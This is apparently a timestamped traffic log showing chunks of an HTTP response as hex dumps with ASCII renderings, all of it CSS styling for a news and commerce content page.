                                                                                                                                                                        2023-06-02 11:13:21 UTC168INData Raw: 74 72 2d 6d 65 74 61 2d 73 65 70 61 72 61 74 6f 72 7b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 63 61 61 73 2d 61 74 74 72 20 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 20 2e 63 61 61 73 2d 61 74 74 72 2d 74 69 6d 65 2d 73 74 79 6c 65 7b 63 6f 6c 6f 72 3a 23 36 65 37 37 38 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 63 61 61 73 2d 61 74 74 72 20 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 20 2e 63 61 61 73 2d 61 74 74 72 2d 74 69 6d 65 2d 73 74 79 6c 65 20 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 2d 73 65 70 61 72 61 74 6f 72 7b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 7d 2e 63 61 61 73 2d 61 74 74 72 20
                                                                                                                                                                        Data Ascii: tr-meta-separator{padding:0 10px}.caas-attr .caas-attr-meta .caas-attr-time-style{color:#6e7780;display:block;font-size:14px;line-height:1;padding-top:5px}.caas-attr .caas-attr-meta .caas-attr-time-style .caas-attr-meta-separator{padding:0 8px}.caas-attr
                                                                                                                                                                        2023-06-02 11:13:21 UTC169INData Raw: 63 6f 6d 6d 65 72 63 65 2d 63 61 61 73 2d 61 74 74 72 20 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 20 2e 63 61 61 73 2d 61 74 74 72 2d 74 69 6d 65 2d 73 74 79 6c 65 20 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 2d 73 65 70 61 72 61 74 6f 72 7b 70 61 64 64 69 6e 67 3a 30 20 34 70 78 7d 2e 63 61 61 73 2d 6c 6f 67 6f 20 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 7b 63 6f 6c 6f 72 3a 23 35 62 36 33 36 61 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 63 61 61 73 2d 6c 6f 67 6f 20 2e 63 61 61 73 2d 6c 6f 67 6f 2d 64 69 76 69 64 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69
                                                                                                                                                                        Data Ascii: commerce-caas-attr .caas-attr-meta .caas-attr-time-style .caas-attr-meta-separator{padding:0 4px}.caas-logo .caas-attr-provider{color:#5b636a;font-size:.875em;font-weight:500;line-height:22px;vertical-align:middle}.caas-logo .caas-logo-divider{border:soli
                                                                                                                                                                        2023-06-02 11:13:21 UTC170INData Raw: 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 2d 6c 6f 67 6f 2e 63 61 61 73 2d 69 6d 67 2d 65 72 72 6f 72 20 2e 63 61 61 73 2d 69 6d 67 2c 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 2d 6c 6f 67 6f 2e 63 61 61 73 2d 69 6d 67 2d 65 72 72 6f 72 20 2e 63 61 61 73 2d 6c 6f 67 6f 2d 64 69 76 69 64 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 2d 6c 6f 67 6f 2e 63 61 61 73 2d 69 6d 67 2d 65 72 72 6f 72 20 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64 65 72 2b 2e 63 61 61 73 2d 6c 6f 67 6f 2d 64 69 76 69 64 65 72 2c 2e 63 61 61 73 2d 61 74 74 72 2d 70 72 6f 76 69 64
                                                                                                                                                                        Data Ascii: s-attr-provider-logo.caas-img-error .caas-img,.caas-attr-provider-logo.caas-img-error .caas-logo-divider{display:none}.caas-attr-provider-logo.caas-img-error .caas-attr-provider{display:inline-block}.caas-attr-provider+.caas-logo-divider,.caas-attr-provid
                                                                                                                                                                        2023-06-02 11:13:21 UTC172INData Raw: 66 61 63 65 62 6f 6f 6b 7b 63 6f 6c 6f 72 3a 23 31 32 34 62 63 62 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 66 61 63 65 62 6f 6f 6b 20 70 61 74 68 7b 66 69 6c 6c 3a 23 31 32 34 62 63 62 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 74 77 69 74 74 65 72 7b 63 6f 6c 6f 72 3a 23 33 33 62 36 66 66 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 74 77 69 74 74 65 72 20 70 61 74 68 7b 66 69 6c 6c 3a 23 33 33 62 36 66 66 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6c 69 6e 65 7b 63 6f 6c 6f 72 3a 23 30 30 62 39 30 30 7d 2e 63 61 61 73 2d
                                                                                                                                                                        Data Ascii: facebook{color:#124bcb}.caas-share-section .caas-button.facebook path{fill:#124bcb}.caas-share-section .caas-button.twitter{color:#33b6ff}.caas-share-section .caas-button.twitter path{fill:#33b6ff}.caas-share-section .caas-button.line{color:#00b900}.caas-
                                                                                                                                                                        2023-06-02 11:13:21 UTC173INData Raw: 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 70 61 74 68 7b 66 69 6c 6c 3a 23 32 33 32 61 33 31 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 63 61 61 73 2d 63 6f 6d 6d 65 6e 74 2e 63 61 61 73 2d 74 6f 6f 6c 74 69 70 3a 68 6f 76 65 72 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 61 61 73 2d 73 68 61 72 65 2d 73 65 63 74 69 6f 6e 20 2e 72 65 61 63 74 69 6f 6e 73 2d 63 6f 75 6e 74 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 34 65 6d 3b 6c 65 66 74 3a 32 38 70 78 3b 70 6f 73 69 74 69 6f 6e
                                                                                                                                                                        Data Ascii: e-section .caas-button:hover{color:#232a31}.caas-share-section .caas-button:hover path{fill:#232a31}.caas-share-section .caas-comment.caas-tooltip:hover:before{opacity:0}.caas-share-section .reactions-count{display:none;font-size:1.34em;left:28px;position
                                                                                                                                                                        2023-06-02 11:13:21 UTC174INData Raw: 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 61 61 73 2d 72 65 61 64 6d 6f 72 65 2d 63 6f 6c 6c 61 70 73 65 3a 6e 6f 74 28 2e 61 63 74 69 76 65 29 7e 2e 76 69 65 77 2d 63 6d 74 73 2d 63 74 61 2d 77 72 61 70 70 65 72 7b 62 6f 74 74 6f 6d 3a 31 32 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 31 30 25 7d 2e 63 61 61 73 2d 72 65 61 64 6d 6f 72 65 2d 63 6f 6c 6c 61 70 73 65 3a 6e 6f 74 28 2e 61 63 74 69 76 65 29 7e 2e 76 69 65 77 2d 63 6d 74 73 2d 63 74 61 2d 77 72 61 70 70 65 72 20 2e 76 69 65 77 2d 63 6d 74 73 2d 63 74 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61
                                                                                                                                                                        Data Ascii: :none!important}.caas-readmore-collapse:not(.active)~.view-cmts-cta-wrapper{bottom:12px;display:inline-block!important;position:absolute;right:10%}.caas-readmore-collapse:not(.active)~.view-cmts-cta-wrapper .view-cmts-cta{display:inline-block!important;ma
                                                                                                                                                                        2023-06-02 11:13:21 UTC176INData Raw: 67 63 61 70 74 69 6f 6e 20 2a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 63 61 61 73 20 66 69 67 75 72 65 20 66 69 67 63 61 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 61 61 73 20 66 69 67 75 72 65 20 66 69 67 63 61 70 74 69 6f 6e 2e 63 61 70 74 69 6f 6e 2d 61 6c 69 67 6e 65 64 2d 77 69 74 68 2d 69 6d 61 67 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 63 61 61 73 20 66 69 67 75 72 65 20 66 69 67 63 61 70 74 69 6f 6e 20 68 32 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 6d 61 72 67 69 6e 3a 2e 38 65 6d 20 30 7d 2e 63 61 61 73 20 66
                                                                                                                                                                        Data Ascii: gcaption *{font-size:1em}.caas figure figcaption.collapsed{overflow:hidden}.caas figure figcaption.caption-aligned-with-image{margin-left:auto;margin-right:auto}.caas figure figcaption h2{color:#000;font-size:1.4em;line-height:normal;margin:.8em 0}.caas f
                                                                                                                                                                        2023-06-02 11:13:21 UTC177INData Raw: 65 20 2e 63 61 61 73 2d 69 6d 67 2d 6c 69 67 68 74 62 6f 78 3a 6e 6f 74 28 2e 6e 6f 68 65 69 67 68 74 29 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 66 69 67 75 72 65 20 2e 63 61 61 73 2d 69 6d 67 2d 6c 69 67 68 74 62 6f 78 20 2e 63 61 61 73 2d 6c 69 67 68 74 62 6f 78 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 74 74 6f 6d 3a 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74
                                                                                                                                                                        Data Ascii: e .caas-img-lightbox:not(.noheight) img{position:static;transform:none}.caas-figure .caas-img-lightbox .caas-lightbox{background:transparent;border:none;bottom:0;cursor:pointer;height:100%;left:0;margin:0;outline:none;padding:0;position:absolute;right:0;t
                                                                                                                                                                        2023-06-02 11:13:21 UTC178INData Raw: 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 2c 30 20 34 70 78 20 31 36 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 72 69 67 68 74 3a 34 30 70 78 3b 74 6f 70 3a 34 30 70 78 3b 77 69 64 74 68 3a 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 20 2e 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 20 2e 69 63 6f 6e 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 20 2e 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 20 2e 69 63 6f 6e 20 73 76 67 7b 66 69 6c 6c 3a 23 32 33 32 61 33 31 7d 2e 63 61 61 73 2d 69 6d 61 67 65 2d 6c 69 67 68 74 62 6f 78 20 2e 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 3a 66 6f
                                                                                                                                                                        Data Ascii: 2px rgba(0,0,0,.05),0 4px 16px rgba(0,0,0,.2);height:60px;right:40px;top:40px;width:60px;z-index:2}.caas-image-lightbox .close-button .icon{pointer-events:none}.caas-image-lightbox .close-button .icon svg{fill:#232a31}.caas-image-lightbox .close-button:fo
                                                                                                                                                                        2023-06-02 11:13:21 UTC179INData Raw: 2e 63 61 61 73 2d 69 6d 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 63 61 61 73 2d 63 61 74 65 67 6f 72 79 2d 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 31 39 38 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 37 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 2d 62 75 74 74 6f 6e 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 35 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70
                                                                                                                                                                        Data Ascii: .caas-img{border-radius:8px}.caas-category-label{color:#198fff;font-size:1.077em;margin:0 0 5px;padding:0}.caas-body-wrapper .caas-body-collapse-button{color:#000;cursor:pointer;display:none;font-size:1.15em;margin-top:10px;padding-left:0}.caas-body-wrapp
                                                                                                                                                                        2023-06-02 11:13:21 UTC181INData Raw: 3a 30 20 33 30 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 61 2e 61 74 68 65 6e 61 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 66 33 66 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 37 35 39 66 66 3b 63 6f 6c 6f 72 3a 23 37 37 35 39 66 66 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 77 72 61 70 70 65 72 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 34 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64
                                                                                                                                                                        Data Ascii: :0 30px;width:auto}.caas[data-device=smartphone] a.athena-button:hover{background-color:#f0f3f5;border-color:#7759ff;color:#7759ff}.caas[data-device=smartphone] .caas-recipe-info-wrapper{justify-content:space-between;margin-top:-4px;padding:0}.caas[data-d
                                                                                                                                                                        2023-06-02 11:13:21 UTC181INData Raw: 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 33 34 7d 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 69 74 65 6d 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 69 74 65 6d 2d 63 61 74 65 67 6f 72 79 7b 63 6f 6c 6f 72 3a 23 36 65 37 37 38 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 32 33 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 66 6f 2d 69
                                                                                                                                                                        Data Ascii: isplay:flex;flex-direction:column;flex-grow:1;line-height:1.334}.caas-recipe-info-wrapper .caas-recipe-info-item .caas-recipe-info-item-category{color:#6e7780;font-size:.923em;font-weight:500;margin-bottom:4px}.caas-recipe-info-wrapper .caas-recipe-info-i
                                                                                                                                                                        2023-06-02 11:13:21 UTC183INData Raw: 67 72 65 64 69 65 6e 74 73 2d 69 6e 66 6f 2d 6e 61 6d 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 38 39 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 63 61 70 69 74 61 6c 69 7a 65 7d 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 67 72 65 64 69 65 6e 74 73 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 67 72 65 64 69 65 6e 74 73 2d 69 6e 66 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 69 6e 67 72 65 64 69 65 6e 74 73 2d 69 6e 66 6f 2d 6c 69 73 74 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 33 33 33 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74
                                                                                                                                                                        Data Ascii: gredients-info-name{font-size:.889em;font-weight:600;line-height:1.25;margin-bottom:1em;text-transform:capitalize}.caas-recipe-ingredients-wrapper .caas-recipe-ingredients-info-wrapper .caas-recipe-ingredients-info-list{margin-bottom:1.333em;padding-right
                                                                                                                                                                        2023-06-02 11:13:21 UTC184INData Raw: 73 2d 72 65 63 69 70 65 2d 64 69 72 65 63 74 69 6f 6e 2d 77 72 61 70 70 65 72 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 6d 61 72 67 69 6e 3a 33 30 70 78 20 30 7d 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 64 69 72 65 63 74 69 6f 6e 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 64 69 72 65 63 74 69 6f 6e 2d 74 69 74 6c 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 33 38 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f
                                                                                                                                                                        Data Ascii: s-recipe-direction-wrapper{color:#232a31;display:flex;flex-direction:column;margin:30px 0}.caas-recipe-direction-wrapper .caas-recipe-direction-title{display:flex;font-size:1.538em;font-weight:700;justify-content:space-between;line-height:1.4;margin-botto
                                                                                                                                                                        2023-06-02 11:13:21 UTC185INData Raw: 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 31 35 34 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 39 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 31 34 33 65 6d 20 31 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 31 34 33 65 6d 7d 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 64 69 72 65 63 74 69 6f 6e 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 65 63 69 70 65 2d 64 69 72 65 63 74 69 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 34 33 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 36 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                                                                        Data Ascii: on-list-item{font-size:2.154em;font-weight:700;line-height:1.29;list-style-type:decimal;margin:0 0 1.143em 1em;padding-left:.143em}.caas-recipe-direction-wrapper .caas-recipe-direction-list-item p{font-size:.643em;font-weight:400;line-height:1.56;margin:0
                                                                                                                                                                        2023-06-02 11:13:21 UTC186INData Raw: 66 36 39 66 66 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 73 74 6f 63 6b 2d 63 68 61 72 74 20 2e 74 69 63 6b 65 72 2d 63 68 61 72 74 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 30 20 33 70 78 20 38 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 3b 6d 61 72 67 69 6e 3a 34 30 70 78 20 30 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 20 32 30 70 78 20 30 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 73 74 6f 63 6b 2d 63 68 61 72 74 20 2e 74 69 63 6b 65 72 2d 63 68 61 72 74 20 2e 6c 65 67 65 6e 64 2d 69 74 65 6d 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 73 74 6f 63 6b 2d 63 68 61 72 74 20 69 66 72 61
                                                                                                                                                                        Data Ascii: f69ff}.caas .caas-stock-chart .ticker-chart{border-radius:8px;box-shadow:0 0 1px 0 rgba(0,0,0,.2),0 3px 8px 0 rgba(0,0,0,.08);margin:40px 0;padding:20px 20px 0}.caas .caas-stock-chart .ticker-chart .legend-item{line-height:1em}.caas .caas-stock-chart ifra
                                                                                                                                                                        2023-06-02 11:13:21 UTC188INData Raw: 63 61 61 73 2d 63 6f 75 70 6f 6e 2e 63 6f 70 69 65 64 20 2e 6c 6f 61 64 65 72 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 2e 63 6f 70 69 65 64 20 2e 6c 6f 61 64 65 72 2c 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 2e 63 6f 70 69 65 64 20 2e 6d 73 67 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 2e 63 6f 70 69 65 64 20 2e 63 6f 75 70 6f 6e 54 65 78 74 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 2e 63 6f 70 69 65 64 20 2e 63 68 65 63 6b 6d 61 72 6b 2e 69 63 6f 6e 20 73 76 67 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 3a 61 63 74 69 76 65 3a 6e 6f 74 28 2e 63 6f 70 69 65 64 29 2c 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 3a 66 6f 63 75 73 3a 6e 6f
                                                                                                                                                                        Data Ascii: caas-coupon.copied .loader{transform:scale(1)}.caas-coupon.copied .loader,.caas-coupon.copied .msg{opacity:1}.caas-coupon.copied .couponText{opacity:0}.caas-coupon.copied .checkmark.icon svg{fill:#fff}.caas-coupon:active:not(.copied),.caas-coupon:focus:no
                                                                                                                                                                        2023-06-02 11:13:21 UTC189INData Raw: 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 6e 61 6d 65 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 64 65 73 63 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 33 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 36 32 35 3b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30 20 33 32 70 78 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 64 65 73 63 20 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 75 6e 73 65 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 6c 69 73 74 2d 69 6e 66 6f 7b 66 6c 65 78 3a 31 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 20 30 7d 2e 63 61 61 73
                                                                                                                                                                        Data Ascii: sition:absolute;width:100%}.caas .pd-list .name{color:#232a31}.caas .pd-list .desc{font-size:1.23em;line-height:1.625;margin:16px 0 32px}.caas .pd-list .desc p{font-size:unset;line-height:unset;margin:0}.caas .pd-list .list-info{flex:1;margin:auto 0}.caas
                                                                                                                                                                        2023-06-02 11:13:21 UTC190INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 73 61 76 65 64 2d 70 72 69 63 65 2e 64 65 61 6c 73 2d 70 72 69 63 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 38 39 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 34 70 78 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 37 37 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 33 3b 6d 61 72 67 69 6e 3a 38 70 78 20 61 75 74 6f 20 33 70 78 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 7d 2e 63 61 61 73 20 2e 70 64 2d 6c 69 73 74 20 2e 63 61 61 73 2d 63 6f 75 70 6f 6e 20 2e 69 63 6f 6e 7b 6d 61
                                                                                                                                                                        Data Ascii: font-weight:700}.caas .pd-list .saved-price.deals-price{font-size:.889em;margin-left:14px}.caas .pd-list .caas-coupon{display:block;font-size:1.077em;font-weight:700;line-height:1.43;margin:8px auto 3px;padding:4px 8px}.caas .pd-list .caas-coupon .icon{ma
